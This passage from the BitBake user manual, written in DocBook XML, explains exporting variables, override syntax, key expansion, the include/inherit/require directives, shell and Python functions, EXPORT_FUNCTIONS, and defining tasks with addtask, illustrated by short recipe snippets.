- <title>Exporting Variables to the Environment</title>
-
- <para>
- You can export variables to the environment of running
- tasks by using the <filename>export</filename> keyword.
- For example, in the following example, the
- <filename>do_foo</filename> task prints "value from
- the environment" when run:
- <literallayout class='monospaced'>
- export ENV_VARIABLE
- ENV_VARIABLE = "value from the environment"
-
- do_foo() {
- bbplain "$ENV_VARIABLE"
- }
- </literallayout>
- <note>
- BitBake does not expand <filename>$ENV_VARIABLE</filename>
- in this case because it lacks the obligatory
- <filename>{}</filename>.
- Rather, <filename>$ENV_VARIABLE</filename> is expanded
- by the shell.
- </note>
- It does not matter whether
- <filename>export ENV_VARIABLE</filename> appears before or
- after assignments to <filename>ENV_VARIABLE</filename>.
- </para>
-
- <para>
- It is also possible to combine <filename>export</filename>
- with setting a value for the variable.
- Here is an example:
- <literallayout class='monospaced'>
- export ENV_VARIABLE = "<replaceable>variable-value</replaceable>"
- </literallayout>
- In the output of <filename>bitbake -e</filename>, variables
- that are exported to the environment are preceded by "export".
- </para>
-
- <para>
- Among the variables commonly exported to the environment
- are <filename>CC</filename> and <filename>CFLAGS</filename>,
- which are picked up by many build systems.
- </para>
- </section>
-
- <section id='conditional-syntax-overrides'>
- <title>Conditional Syntax (Overrides)</title>
-
- <para>
- BitBake uses
- <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
- to control what variables are overridden after BitBake
- parses recipes and configuration files.
- This section describes how you can use
- <filename>OVERRIDES</filename> as conditional metadata,
- talks about key expansion in relationship to
- <filename>OVERRIDES</filename>, and provides some examples
- to help with understanding.
- </para>
-
- <section id='conditional-metadata'>
- <title>Conditional Metadata</title>
-
- <para>
- You can use <filename>OVERRIDES</filename> to conditionally select
- a specific version of a variable and to conditionally
- append or prepend the value of a variable.
- <note>
- Overrides can only use lower-case characters.
- Additionally, underscores are not permitted in override names
- as they are used to separate overrides from each other and
- from the variable name.
- </note>
- <itemizedlist>
- <listitem><para><emphasis>Selecting a Variable:</emphasis>
- The <filename>OVERRIDES</filename> variable is
- a colon-character-separated list that contains items
- for which you want to satisfy conditions.
- Thus, if you have a variable that is conditional on “armâ€, and “armâ€
- is in <filename>OVERRIDES</filename>, then the “armâ€-specific
- version of the variable is used rather than the non-conditional
- version.
- Here is an example:
- <literallayout class='monospaced'>
- OVERRIDES = "architecture:os:machine"
- TEST = "default"
- TEST_os = "osspecific"
- TEST_nooverride = "othercondvalue"
- </literallayout>
- In this example, the <filename>OVERRIDES</filename>
- variable lists three overrides:
- "architecture", "os", and "machine".
- The variable <filename>TEST</filename> by itself has a default
- value of "default".
- You select the os-specific version of the <filename>TEST</filename>
- variable by appending the "os" override to the variable
- (i.e.<filename>TEST_os</filename>).
- </para>
-
- <para>
- To better understand this, consider a practical example
- that assumes an OpenEmbedded metadata-based Linux
- kernel recipe file.
- The following lines from the recipe file first set
- the kernel branch variable <filename>KBRANCH</filename>
- to a default value, then conditionally override that
- value based on the architecture of the build:
- <literallayout class='monospaced'>
- KBRANCH = "standard/base"
- KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
- KBRANCH_qemumips = "standard/mti-malta32"
- KBRANCH_qemuppc = "standard/qemuppc"
- KBRANCH_qemux86 = "standard/common-pc/base"
- KBRANCH_qemux86-64 = "standard/common-pc-64/base"
- KBRANCH_qemumips64 = "standard/mti-malta64"
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Appending and Prepending:</emphasis>
- BitBake also supports append and prepend operations to
- variable values based on whether a specific item is
- listed in <filename>OVERRIDES</filename>.
- Here is an example:
- <literallayout class='monospaced'>
- DEPENDS = "glibc ncurses"
- OVERRIDES = "machine:local"
- DEPENDS_append_machine = " libmad"
- </literallayout>
- In this example, <filename>DEPENDS</filename> becomes
- "glibc ncurses libmad".
- </para>
-
- <para>
- Again, using an OpenEmbedded metadata-based
- kernel recipe file as an example, the
- following lines will conditionally append to the
- <filename>KERNEL_FEATURES</filename> variable based
- on the architecture:
- <literallayout class='monospaced'>
- KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
- KERNEL_FEATURES_append_qemux86=" cfg/sound.scc cfg/paravirt_kvm.scc"
- KERNEL_FEATURES_append_qemux86-64=" cfg/sound.scc cfg/paravirt_kvm.scc"
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Setting a Variable for a Single Task:</emphasis>
- BitBake supports setting a variable just for the
- duration of a single task.
- Here is an example:
- <literallayout class='monospaced'>
- FOO_task-configure = "val 1"
- FOO_task-compile = "val 2"
- </literallayout>
- In the previous example, <filename>FOO</filename>
- has the value "val 1" while the
- <filename>do_configure</filename> task is executed,
- and the value "val 2" while the
- <filename>do_compile</filename> task is executed.
- </para>
-
- <para>Internally, this is implemented by prepending
- the task (e.g. "task-compile:") to the value of
- <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
- for the local datastore of the <filename>do_compile</filename>
- task.</para>
-
- <para>You can also use this syntax with other combinations
- (e.g. "<filename>_prepend</filename>") as shown in the
- following example:
- <literallayout class='monospaced'>
- EXTRA_OEMAKE_prepend_task-compile = "${PARALLEL_MAKE} "
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='key-expansion'>
- <title>Key Expansion</title>
-
- <para>
- Key expansion happens when the BitBake datastore is finalized.
- To better understand this, consider the following example:
- <literallayout class='monospaced'>
- A${B} = "X"
- B = "2"
- A2 = "Y"
- </literallayout>
- In this case, after all the parsing is complete,
- BitBake expands <filename>${B}</filename> into "2".
- This expansion causes <filename>A2</filename>, which was
- set to "Y" before the expansion, to become "X".
- </para>
- </section>
-
- <section id='variable-interaction-worked-examples'>
- <title>Examples</title>
-
- <para>
- Despite the previous explanations that show the different forms of
- variable definitions, it can be hard to work
- out exactly what happens when variable operators, conditional
- overrides, and unconditional overrides are combined.
- This section presents some common scenarios along
- with explanations for variable interactions that
- typically confuse users.
- </para>
-
- <para>
- There is often confusion concerning the order in which
- overrides and various "append" operators take effect.
- Recall that an append or prepend operation using "_append"
- and "_prepend" does not result in an immediate assignment
- as would "+=", ".=", "=+", or "=.".
- Consider the following example:
- <literallayout class='monospaced'>
- OVERRIDES = "foo"
- A = "Z"
- A_foo_append = "X"
- </literallayout>
- For this case, <filename>A</filename> is
- unconditionally set to "Z" and "X" is
- unconditionally and immediately appended to the variable
- <filename>A_foo</filename>.
- Because overrides have not been applied yet,
- <filename>A_foo</filename> is set to "X" due to the append
- and <filename>A</filename> simply equals "Z".
- </para>
-
- <para>
- Applying overrides, however, changes things.
- Since "foo" is listed in <filename>OVERRIDES</filename>,
- the conditional variable <filename>A</filename> is replaced
- with the "foo" version, which is equal to "X".
- So effectively, <filename>A_foo</filename> replaces <filename>A</filename>.
- </para>
-
- <para>
- This next example changes the order of the override and
- the append:
- <literallayout class='monospaced'>
- OVERRIDES = "foo"
- A = "Z"
- A_append_foo = "X"
- </literallayout>
- For this case, before overrides are handled,
- <filename>A</filename> is set to "Z" and <filename>A_append_foo</filename>
- is set to "X".
- Once the override for "foo" is applied, however,
- <filename>A</filename> gets appended with "X".
- Consequently, <filename>A</filename> becomes "ZX".
- Notice that spaces are not appended.
- </para>
-
- <para>
- This next example has the order of the appends and overrides reversed
- back as in the first example:
- <literallayout class='monospaced'>
- OVERRIDES = "foo"
- A = "Y"
- A_foo_append = "Z"
- A_foo_append = "X"
- </literallayout>
- For this case, before any overrides are resolved,
- <filename>A</filename> is set to "Y" using an immediate assignment.
- After this immediate assignment, <filename>A_foo</filename> is set
- to "Z", and then further appended with
- "X" leaving the variable set to "ZX".
- Finally, applying the override for "foo" results in the conditional
- variable <filename>A</filename> becoming "ZX" (i.e.
- <filename>A</filename> is replaced with <filename>A_foo</filename>).
- </para>
-
- <para>
- This final example mixes in some varying operators:
- <literallayout class='monospaced'>
- A = "1"
- A_append = "2"
- A_append = "3"
- A += "4"
- A .= "5"
- </literallayout>
- For this case, the type of append operators are affecting the
- order of assignments as BitBake passes through the code
- multiple times.
- Initially, <filename>A</filename> is set to "1 45" because
- of the three statements that use immediate operators.
- After these assignments are made, BitBake applies the
- "_append" operations.
- Those operations result in <filename>A</filename> becoming "1 4523".
- </para>
- </section>
- </section>
-
- <section id='sharing-functionality'>
- <title>Sharing Functionality</title>
-
- <para>
- BitBake allows for metadata sharing through include files
- (<filename>.inc</filename>) and class files
- (<filename>.bbclass</filename>).
- For example, suppose you have a piece of common functionality
- such as a task definition that you want to share between
- more than one recipe.
- In this case, creating a <filename>.bbclass</filename>
- file that contains the common functionality and then using
- the <filename>inherit</filename> directive in your recipes to
- inherit the class would be a common way to share the task.
- </para>
-
- <para>
- This section presents the mechanisms BitBake provides to
- allow you to share functionality between recipes.
- Specifically, the mechanisms include <filename>include</filename>,
- <filename>inherit</filename>, <filename>INHERIT</filename>, and
- <filename>require</filename> directives.
- </para>
-
- <section id='locating-include-and-class-files'>
- <title>Locating Include and Class Files</title>
-
- <para>
- BitBake uses the
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
- variable to locate needed include and class files.
- Additionally, BitBake searches the current directory for
- <filename>include</filename> and <filename>require</filename>
- directives.
- <note>
- The <filename>BBPATH</filename> variable is analogous to
- the environment variable <filename>PATH</filename>.
- </note>
- </para>
-
- <para>
- In order for include and class files to be found by BitBake,
- they need to be located in a "classes" subdirectory that can
- be found in <filename>BBPATH</filename>.
- </para>
- </section>
-
- <section id='inherit-directive'>
- <title><filename>inherit</filename> Directive</title>
-
- <para>
- When writing a recipe or class file, you can use the
- <filename>inherit</filename> directive to inherit the
- functionality of a class (<filename>.bbclass</filename>).
- BitBake only supports this directive when used within recipe
- and class files (i.e. <filename>.bb</filename> and
- <filename>.bbclass</filename>).
- </para>
-
- <para>
- The <filename>inherit</filename> directive is a rudimentary
- means of specifying functionality contained in class files
- that your recipes require.
- For example, you can easily abstract out the tasks involved in
- building a package that uses Autoconf and Automake and put
- those tasks into a class file and then have your recipe
- inherit that class file.
- </para>
-
- <para>
- As an example, your recipes could use the following directive
- to inherit an <filename>autotools.bbclass</filename> file.
- The class file would contain common functionality for using
- Autotools that could be shared across recipes:
- <literallayout class='monospaced'>
- inherit autotools
- </literallayout>
- In this case, BitBake would search for the directory
- <filename>classes/autotools.bbclass</filename>
- in <filename>BBPATH</filename>.
- <note>
- You can override any values and functions of the
- inherited class within your recipe by doing so
- after the "inherit" statement.
- </note>
- If you want to use the directive to inherit
- multiple classes, separate them with spaces.
- The following example shows how to inherit both the
- <filename>buildhistory</filename> and <filename>rm_work</filename>
- classes:
- <literallayout class='monospaced'>
- inherit buildhistory rm_work
- </literallayout>
- </para>
-
- <para>
- An advantage with the inherit directive as compared to both
- the
- <link linkend='include-directive'>include</link> and
- <link linkend='require-inclusion'>require</link> directives
- is that you can inherit class files conditionally.
- You can accomplish this by using a variable expression
- after the <filename>inherit</filename> statement.
- Here is an example:
- <literallayout class='monospaced'>
- inherit ${VARNAME}
- </literallayout>
- If <filename>VARNAME</filename> is going to be set, it needs
- to be set before the <filename>inherit</filename> statement
- is parsed.
- One way to achieve a conditional inherit in this case is to use
- overrides:
- <literallayout class='monospaced'>
- VARIABLE = ""
- VARIABLE_someoverride = "myclass"
- </literallayout>
- </para>
-
- <para>
- Another method is by using anonymous Python.
- Here is an example:
- <literallayout class='monospaced'>
- python () {
- if condition == value:
- d.setVar('VARIABLE', 'myclass')
- else:
- d.setVar('VARIABLE', '')
- }
- </literallayout>
- </para>
-
- <para>
- Alternatively, you could use an in-line Python expression
- in the following form:
- <literallayout class='monospaced'>
- inherit ${@'classname' if condition else ''}
- inherit ${@functionname(params)}
- </literallayout>
- In all cases, if the expression evaluates to an empty
- string, the statement does not trigger a syntax error
- because it becomes a no-op.
- </para>
- </section>
-
- <section id='include-directive'>
- <title><filename>include</filename> Directive</title>
-
- <para>
- BitBake understands the <filename>include</filename>
- directive.
- This directive causes BitBake to parse whatever file you specify,
- and to insert that file at that location.
- The directive is much like its equivalent in Make except
- that if the path specified on the include line is a relative
- path, BitBake locates the first file it can find
- within <filename>BBPATH</filename>.
- </para>
-
- <para>
- The include directive is a more generic method of including
- functionality as compared to the
- <link linkend='inherit-directive'>inherit</link> directive,
- which is restricted to class (i.e. <filename>.bbclass</filename>)
- files.
- The include directive is applicable for any other kind of
- shared or encapsulated functionality or configuration that
- does not suit a <filename>.bbclass</filename> file.
- </para>
-
- <para>
- As an example, suppose you needed a recipe to include some
- self-test definitions:
- <literallayout class='monospaced'>
- include test_defs.inc
- </literallayout>
- <note>
- The <filename>include</filename> directive does not
- produce an error when the file cannot be found.
- Consequently, it is recommended that if the file you
- are including is expected to exist, you should use
- <link linkend='require-inclusion'><filename>require</filename></link>
- instead of <filename>include</filename>.
- Doing so makes sure that an error is produced if the
- file cannot be found.
- </note>
- </para>
- </section>
-
- <section id='require-inclusion'>
- <title><filename>require</filename> Directive</title>
-
- <para>
- BitBake understands the <filename>require</filename>
- directive.
- This directive behaves just like the
- <filename>include</filename> directive with the exception that
- BitBake raises a parsing error if the file to be included cannot
- be found.
- Thus, any file you require is inserted into the file that is
- being parsed at the location of the directive.
- </para>
-
- <para>
- The require directive, like the include directive previously
- described, is a more generic method of including
- functionality as compared to the
- <link linkend='inherit-directive'>inherit</link> directive,
- which is restricted to class (i.e. <filename>.bbclass</filename>)
- files.
- The require directive is applicable for any other kind of
- shared or encapsulated functionality or configuration that
- does not suit a <filename>.bbclass</filename> file.
- </para>
-
- <para>
- Similar to how BitBake handles
- <link linkend='include-directive'><filename>include</filename></link>,
- if the path specified
- on the require line is a relative path, BitBake locates
- the first file it can find within <filename>BBPATH</filename>.
- </para>
-
- <para>
- As an example, suppose you have two versions of a recipe
- (e.g. <filename>foo_1.2.2.bb</filename> and
- <filename>foo_2.0.0.bb</filename>) where
- each version contains some identical functionality that could be
- shared.
- You could create an include file named <filename>foo.inc</filename>
- that contains the common definitions needed to build "foo".
- You need to be sure <filename>foo.inc</filename> is located in the
- same directory as your two recipe files as well.
- Once these conditions are set up, you can share the functionality
- using a <filename>require</filename> directive from within each
- recipe:
- <literallayout class='monospaced'>
- require foo.inc
- </literallayout>
- </para>
- </section>
-
- <section id='inherit-configuration-directive'>
- <title><filename>INHERIT</filename> Configuration Directive</title>
-
- <para>
- When creating a configuration file (<filename>.conf</filename>),
- you can use the
- <link linkend='var-bb-INHERIT'><filename>INHERIT</filename></link>
- configuration directive to inherit a class.
- BitBake only supports this directive when used within
- a configuration file.
- </para>
-
- <para>
- As an example, suppose you needed to inherit a class
- file called <filename>abc.bbclass</filename> from a
- configuration file as follows:
- <literallayout class='monospaced'>
- INHERIT += "abc"
- </literallayout>
- This configuration directive causes the named
- class to be inherited at the point of the directive
- during parsing.
- As with the <filename>inherit</filename> directive, the
- <filename>.bbclass</filename> file must be located in a
- "classes" subdirectory in one of the directories specified
- in <filename>BBPATH</filename>.
- <note>
- Because <filename>.conf</filename> files are parsed
- first during BitBake's execution, using
- <filename>INHERIT</filename> to inherit a class effectively
- inherits the class globally (i.e. for all recipes).
- </note>
- If you want to use the directive to inherit
- multiple classes, you can provide them on the same line in the
- <filename>local.conf</filename> file.
- Use spaces to separate the classes.
- The following example shows how to inherit both the
- <filename>autotools</filename> and <filename>pkgconfig</filename>
- classes:
- <literallayout class='monospaced'>
- INHERIT += "autotools pkgconfig"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='functions'>
- <title>Functions</title>
-
- <para>
- As with most languages, functions are the building blocks that
- are used to build up operations into tasks.
- BitBake supports these types of functions:
- <itemizedlist>
- <listitem><para><emphasis>Shell Functions:</emphasis>
- Functions written in shell script and executed either
- directly as functions, tasks, or both.
- They can also be called by other shell functions.
- </para></listitem>
- <listitem><para><emphasis>BitBake-Style Python Functions:</emphasis>
- Functions written in Python and executed by BitBake or other
- Python functions using <filename>bb.build.exec_func()</filename>.
- </para></listitem>
- <listitem><para><emphasis>Python Functions:</emphasis>
- Functions written in Python and executed by Python.
- </para></listitem>
- <listitem><para><emphasis>Anonymous Python Functions:</emphasis>
- Python functions executed automatically during
- parsing.
- </para></listitem>
- </itemizedlist>
- Regardless of the type of function, you can only
- define them in class (<filename>.bbclass</filename>)
- and recipe (<filename>.bb</filename> or <filename>.inc</filename>)
- files.
- </para>
-
- <section id='shell-functions'>
- <title>Shell Functions</title>
-
- <para>
- Functions written in shell script and executed either
- directly as functions, tasks, or both.
- They can also be called by other shell functions.
- Here is an example shell function definition:
- <literallayout class='monospaced'>
- some_function () {
- echo "Hello World"
- }
- </literallayout>
- When you create these types of functions in your recipe
- or class files, you need to follow the shell programming
- rules.
- The scripts are executed by <filename>/bin/sh</filename>,
- which may not be a bash shell but might be something
- such as <filename>dash</filename>.
- You should not use Bash-specific script (bashisms).
- </para>
-
- <para>
- Overrides and override-style operators like
- <filename>_append</filename> and
- <filename>_prepend</filename> can also be applied to
- shell functions.
- Most commonly, this application would be used in a
- <filename>.bbappend</filename> file to modify functions in
- the main recipe.
- It can also be used to modify functions inherited from
- classes.
- </para>
-
- <para>
- As an example, consider the following:
- <literallayout class='monospaced'>
- do_foo() {
- bbplain first
- fn
- }
-
- fn_prepend() {
- bbplain second
- }
-
- fn() {
- bbplain third
- }
-
- do_foo_append() {
- bbplain fourth
- }
- </literallayout>
- Running <filename>do_foo</filename>
- prints the following:
- <literallayout class='monospaced'>
- recipename do_foo: first
- recipename do_foo: second
- recipename do_foo: third
- recipename do_foo: fourth
- </literallayout>
- <note>
- Overrides and override-style operators can
- be applied to any shell function, not just
- <link linkend='tasks'>tasks</link>.
- </note>
- You can use the <filename>bitbake -e</filename>&nbsp;<replaceable>recipename</replaceable>
- command to view the final assembled function
- after all overrides have been applied.
- </para>
- </section>
-
- <section id='bitbake-style-python-functions'>
- <title>BitBake-Style Python Functions</title>
-
- <para>
- These functions are written in Python and executed by
- BitBake or other Python functions using
- <filename>bb.build.exec_func()</filename>.
- </para>
-
- <para>
- An example BitBake function is:
- <literallayout class='monospaced'>
- python some_python_function () {
- d.setVar("TEXT", "Hello World")
- print d.getVar("TEXT")
- }
- </literallayout>
- Because the Python "bb" and "os" modules are already
- imported, you do not need to import these modules.
- Also in these types of functions, the datastore ("d")
- is a global variable and is always automatically
- available.
- <note>
- Variable expressions (e.g. <filename>${X}</filename>)
- are no longer expanded within Python functions.
- This behavior is intentional in order to allow you
- to freely set variable values to expandable expressions
- without having them expanded prematurely.
- If you do wish to expand a variable within a Python
- function, use <filename>d.getVar("X")</filename>.
- Or, for more complicated expressions, use
- <filename>d.expand()</filename>.
- </note>
- </para>
-
- <para>
- Similar to shell functions, you can also apply overrides
- and override-style operators to BitBake-style Python
- functions.
- </para>
-
- <para>
- As an example, consider the following:
- <literallayout class='monospaced'>
- python do_foo_prepend() {
- bb.plain("first")
- }
-
- python do_foo() {
- bb.plain("second")
- }
-
- python do_foo_append() {
- bb.plain("third")
- }
- </literallayout>
- Running <filename>do_foo</filename> prints
- the following:
- <literallayout class='monospaced'>
- recipename do_foo: first
- recipename do_foo: second
- recipename do_foo: third
- </literallayout>
- You can use the <filename>bitbake -e</filename>&nbsp;<replaceable>recipename</replaceable>
- command to view the final assembled function
- after all overrides have been applied.
- </para>
- </section>
-
- <section id='python-functions'>
- <title>Python Functions</title>
-
- <para>
- These functions are written in Python and are executed by
- other Python code.
- Examples of Python functions are utility functions
- that you intend to call from in-line Python or
- from within other Python functions.
- Here is an example:
- <literallayout class='monospaced'>
- def get_depends(d):
- if d.getVar('SOMECONDITION'):
- return "dependencywithcond"
- else:
- return "dependency"
- SOMECONDITION = "1"
- DEPENDS = "${@get_depends(d)}"
- </literallayout>
- This would result in <filename>DEPENDS</filename>
- containing <filename>dependencywithcond</filename>.
- </para>
-
- <para>
- Here are some things to know about Python functions:
- <itemizedlist>
- <listitem><para>Python functions can take parameters.
- </para></listitem>
- <listitem><para>The BitBake datastore is not
- automatically available.
- Consequently, you must pass it in as a
- parameter to the function.
- </para></listitem>
- <listitem><para>The "bb" and "os" Python modules are
- automatically available.
- You do not need to import them.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='bitbake-style-python-functions-versus-python-functions'>
- <title>BitBake-Style Python Functions Versus Python Functions</title>
-
- <para>
- Following are some important differences between
- BitBake-style Python functions and regular Python
- functions defined with "def":
- <itemizedlist>
- <listitem><para>
- Only BitBake-style Python functions can be
- <link linkend='tasks'>tasks</link>.
- </para></listitem>
- <listitem><para>
- Overrides and override-style operators can only
- be applied to BitBake-style Python functions.
- </para></listitem>
- <listitem><para>
- Only regular Python functions can take arguments
- and return values.
- </para></listitem>
- <listitem><para>
- <link linkend='variable-flags'>Variable flags</link>
- such as <filename>[dirs]</filename>,
- <filename>[cleandirs]</filename>, and
- <filename>[lockfiles]</filename> can be used
- on BitBake-style Python functions, but not on
- regular Python functions.
- </para></listitem>
- <listitem><para>
- BitBake-style Python functions generate a separate
- <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}/run.</filename><replaceable>function-name</replaceable><filename>.</filename><replaceable>pid</replaceable>
- script that is executed to run the function, and also
- generate a log file in
- <filename>${T}/log.</filename><replaceable>function-name</replaceable><filename>.</filename><replaceable>pid</replaceable>
- if they are executed as tasks.</para>
-
- <para>
- Regular Python functions execute "inline" and do not
- generate any files in <filename>${T}</filename>.
- </para></listitem>
- <listitem><para>
- Regular Python functions are called with the usual
- Python syntax.
- BitBake-style Python functions are usually tasks and
- are called directly by BitBake, but can also be called
- manually from Python code by using the
- <filename>bb.build.exec_func()</filename> function.
- Here is an example:
- <literallayout class='monospaced'>
- bb.build.exec_func("my_bitbake_style_function", d)
- </literallayout>
- <note>
- <filename>bb.build.exec_func()</filename> can also
- be used to run shell functions from Python code.
- If you want to run a shell function before a Python
- function within the same task, then you can use a
- parent helper Python function that starts by running
- the shell function with
- <filename>bb.build.exec_func()</filename> and then
- runs the Python code.
- </note></para>
-
- <para>To detect errors from functions executed with
- <filename>bb.build.exec_func()</filename>, you
- can catch the <filename>bb.build.FuncFailed</filename>
- exception.
- <note>
- Functions in metadata (recipes and classes) should
- not themselves raise
- <filename>bb.build.FuncFailed</filename>.
- Rather, <filename>bb.build.FuncFailed</filename>
- should be viewed as a general indicator that the
- called function failed by raising an exception.
- For example, an exception raised by
- <filename>bb.fatal()</filename> will be caught inside
- <filename>bb.build.exec_func()</filename>, and a
- <filename>bb.build.FuncFailed</filename> will be raised
- in response.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Due to their simplicity, you should prefer regular Python functions
- over BitBake-style Python functions unless you need a feature specific
- to BitBake-style Python functions.
- Regular Python functions in metadata are a more recent invention than
- BitBake-style Python functions, and older code tends to use
- <filename>bb.build.exec_func()</filename> more often.
- </para>
- </section>
-
- <section id='anonymous-python-functions'>
- <title>Anonymous Python Functions</title>
-
- <para>
- Sometimes it is useful to set variables or perform
- other operations programmatically during parsing.
- To do this, you can define special Python functions,
- called anonymous Python functions, that run at the
- end of parsing.
- For example, the following conditionally sets a variable
- based on the value of another variable:
- <literallayout class='monospaced'>
- python () {
- if d.getVar('SOMEVAR') == 'value':
- d.setVar('ANOTHERVAR', 'value2')
- }
- </literallayout>
- An equivalent way to mark a function as an anonymous
- function is to give it the name "__anonymous", rather
- than no name.
- </para>
-
- <para>
- Anonymous Python functions always run at the end
- of parsing, regardless of where they are defined.
- If a recipe contains many anonymous functions, they
- run in the same order as they are defined within the
- recipe.
- As an example, consider the following snippet:
- <literallayout class='monospaced'>
- python () {
- d.setVar('FOO', 'foo 2')
- }
-
- FOO = "foo 1"
-
- python () {
- d.appendVar('BAR', ' bar 2')
- }
-
- BAR = "bar 1"
- </literallayout>
- The previous example is conceptually equivalent to the
- following snippet:
- <literallayout class='monospaced'>
- FOO = "foo 1"
- BAR = "bar 1"
- FOO = "foo 2"
- BAR += "bar 2"
- </literallayout>
- <filename>FOO</filename> ends up with the value "foo 2",
- and <filename>BAR</filename> with the value "bar 1 bar 2".
- Just as in the second snippet, the values set for the
- variables within the anonymous functions become available
- to tasks, which always run after parsing.
- </para>
-
- <para>
- Overrides and override-style operators such as
- "<filename>_append</filename>" are applied before
- anonymous functions run.
- In the following example, <filename>FOO</filename> ends
- up with the value "foo from anonymous":
- <literallayout class='monospaced'>
- FOO = "foo"
- FOO_append = " from outside"
-
- python () {
- d.setVar("FOO", "foo from anonymous")
- }
- </literallayout>
- For methods you can use with anonymous Python functions,
- see the
- "<link linkend='functions-you-can-call-from-within-python'>Functions You Can Call From Within Python</link>"
- section.
- For a different method to run Python code during parsing,
- see the
- "<link linkend='inline-python-variable-expansion'>Inline Python Variable Expansion</link>"
- section.
- </para>
- </section>
-
- <section id='flexible-inheritance-for-class-functions'>
- <title>Flexible Inheritance for Class Functions</title>
-
- <para>
- Through coding techniques and the use of
- <filename>EXPORT_FUNCTIONS</filename>, BitBake supports
- exporting a function from a class such that the
- class function appears as the default implementation
- of the function, but can still be called if a recipe
- inheriting the class needs to define its own version of
- the function.
- </para>
-
- <para>
- To understand the benefits of this feature, consider
- the basic scenario where a class defines a task function
- and your recipe inherits the class.
- In this basic scenario, your recipe inherits the task
- function as defined in the class.
- If desired, your recipe can add to the start and end of the
- function by using the "_prepend" or "_append" operations
- respectively, or it can redefine the function completely.
- However, if it redefines the function, there is
- no means for it to call the class version of the function.
- <filename>EXPORT_FUNCTIONS</filename> provides a mechanism
- that enables the recipe's version of the function to call
- the original version of the function.
- </para>
-
- <para>
- To make use of this technique, you need the following
- things in place:
- <itemizedlist>
- <listitem><para>
- The class needs to define the function as follows:
- <literallayout class='monospaced'>
- <replaceable>classname</replaceable><filename>_</filename><replaceable>functionname</replaceable>
- </literallayout>
- For example, if you have a class file
- <filename>bar.bbclass</filename> and a function named
- <filename>do_foo</filename>, the class must define the function
- as follows:
- <literallayout class='monospaced'>
- bar_do_foo
- </literallayout>
- </para></listitem>
- <listitem><para>
- The class needs to contain the <filename>EXPORT_FUNCTIONS</filename>
- statement as follows:
- <literallayout class='monospaced'>
- EXPORT_FUNCTIONS <replaceable>functionname</replaceable>
- </literallayout>
- For example, continuing with the same example, the
- statement in the <filename>bar.bbclass</filename> would be
- as follows:
- <literallayout class='monospaced'>
- EXPORT_FUNCTIONS do_foo
- </literallayout>
- </para></listitem>
- <listitem><para>
- You need to call the function appropriately from within your
- recipe.
- Continuing with the same example, if your recipe
- needs to call the class version of the function,
- it should call <filename>bar_do_foo</filename>.
- Assuming <filename>do_foo</filename> was a shell function
- and <filename>EXPORT_FUNCTIONS</filename> was used as above,
- the recipe's function could conditionally call the
- class version of the function as follows:
- <literallayout class='monospaced'>
- do_foo() {
- if [ somecondition ] ; then
- bar_do_foo
- else
- # Do something else
- fi
- }
- </literallayout>
- To call your modified version of the function as defined
- in your recipe, call it as <filename>do_foo</filename>.
- </para></listitem>
- </itemizedlist>
- With these conditions met, your single recipe
- can freely choose between the original function
- as defined in the class file and the modified function in your recipe.
- If you do not set up these conditions, you are limited to using one function
- or the other.
- </para>
- </section>
- </section>
-
- <section id='tasks'>
- <title>Tasks</title>
-
- <para>
- Tasks are BitBake execution units that make up the
- steps that BitBake can run for a given recipe.
- Tasks are only supported in recipes and classes
- (i.e. in <filename>.bb</filename> files and files
- included or inherited from <filename>.bb</filename>
- files).
- By convention, tasks have names that start with "do_".
- </para>
-
- <section id='promoting-a-function-to-a-task'>
- <title>Promoting a Function to a Task</title>
-
- <para>
- Tasks are either
- <link linkend='shell-functions'>shell functions</link> or
- <link linkend='bitbake-style-python-functions'>BitBake-style Python functions</link>
- that have been promoted to tasks by using the
- <filename>addtask</filename> command.
- The <filename>addtask</filename> command can also
- optionally describe dependencies between the
- task and other tasks.
- Here is an example that shows how to define a task
- and declare some dependencies:
- <literallayout class='monospaced'>
- python do_printdate () {
- import time
- print time.strftime('%Y%m%d', time.gmtime())
- }
- addtask printdate after do_fetch before do_build
- </literallayout>
- The first argument to <filename>addtask</filename>
- is the name of the function to promote to
- a task.
- If the name does not start with "do_", "do_" is
- implicitly added, which enforces the convention that
- all task names start with "do_".
- </para>
-
- <para>
- In the previous example, the
- <filename>do_printdate</filename> task becomes a
- dependency of the <filename>do_build</filename>
- task, which is the default task (i.e. the task run by
- the <filename>bitbake</filename> command unless
- another task is specified explicitly).
- Additionally, the <filename>do_printdate</filename>
- task becomes dependent upon the
- <filename>do_fetch</filename> task.
- Running the <filename>do_build</filename> task
- results in the <filename>do_printdate</filename>
- task running first.
- <note>
- If you try out the previous example, you might see that
- the <filename>do_printdate</filename> task is only run
- the first time you build the recipe with
- the <filename>bitbake</filename> command.
- This is because BitBake considers the task "up-to-date"
- after that initial run.
- If you want to force the task to always be rerun for
- experimentation purposes, you can make BitBake always
- consider the task "out-of-date" by using the
- <filename>[</filename><link linkend='variable-flags'><filename>nostamp</filename></link><filename>]</filename>
- variable flag, as follows:
- <literallayout class='monospaced'>
- do_printdate[nostamp] = "1"
- </literallayout>
- You can also explicitly run the task and provide the
- <filename>-f</filename> option as follows:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>recipe</replaceable> -c printdate -f
- </literallayout>
- When manually selecting a task to run with the
- <filename>bitbake</filename>&nbsp;<replaceable>recipe</replaceable>&nbsp;<filename>-c</filename>&nbsp;<replaceable>task</replaceable>
- command, you can omit the "do_" prefix as part of the
- task name.
- </note>
- </para>
-
- <para>
- You might wonder about the practical effects of using
- <filename>addtask</filename> without specifying any
- dependencies as is done in the following example:
- <literallayout class='monospaced'>
- addtask printdate
- </literallayout>
- In this example, assuming dependencies have not been
- added through some other means, the only way to run
- the task is by explicitly selecting it with
- <filename>bitbake</filename>&nbsp;<replaceable>recipe</replaceable>&nbsp;<filename>-c printdate</filename>.
- You can use the
- <filename>do_listtasks</filename> task to list all tasks
